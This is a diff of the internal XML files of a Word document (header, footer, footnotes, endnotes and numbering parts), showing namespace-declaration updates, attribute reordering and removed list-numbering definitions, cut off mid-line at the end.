xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:endnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -2562,7 +3449,7 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:tbl>
     <w:tblPr>
       <w:tblW w:w="0" w:type="auto"/>
@@ -2620,7 +3507,7 @@
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:footnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -2645,7 +3532,7 @@
 </file>
 
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:tbl>
     <w:tblPr>
       <w:tblW w:w="0" w:type="auto"/>
@@ -2667,7 +3554,7 @@
             <w:pStyle w:val="Header"/>
             <w:ind w:left="-115"/>
             <w:rPr>
-              <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+              <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
               <w:b/>
               <w:bCs/>
               <w:sz w:val="20"/>
@@ -2676,7 +3563,7 @@
           </w:pPr>
           <w:r>
             <w:rPr>
-              <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+              <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
               <w:b/>
               <w:bCs/>
               <w:sz w:val="20"/>
@@ -2695,7 +3582,7 @@
             <w:pStyle w:val="Header"/>
             <w:jc w:val="center"/>
             <w:rPr>
-              <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+              <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
               <w:b/>
               <w:bCs/>
               <w:sz w:val="20"/>
@@ -2714,7 +3601,7 @@
             <w:ind w:right="-115"/>
             <w:jc w:val="right"/>
             <w:rPr>
-              <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+              <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
               <w:b/>
               <w:bCs/>
               <w:sz w:val="20"/>
@@ -2729,7 +3616,7 @@
     <w:pPr>
       <w:pStyle w:val="Header"/>
       <w:rPr>
-        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+        <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
         <w:b/>
         <w:bCs/>
         <w:sz w:val="20"/>
@@ -2741,177 +3628,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
-  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="9">
-    <w:nsid w:val="50af6fcd"/>
-    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="2">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="2160" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="3">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="4">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="5">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="4320" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="6">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="7">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="8">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="6480" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="8">
-    <w:nsid w:val="13ac1b6e"/>
-    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%1."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="2">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="2160" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="3">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="4">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="5">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="4320" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="6">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="7">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="8">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="6480" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" 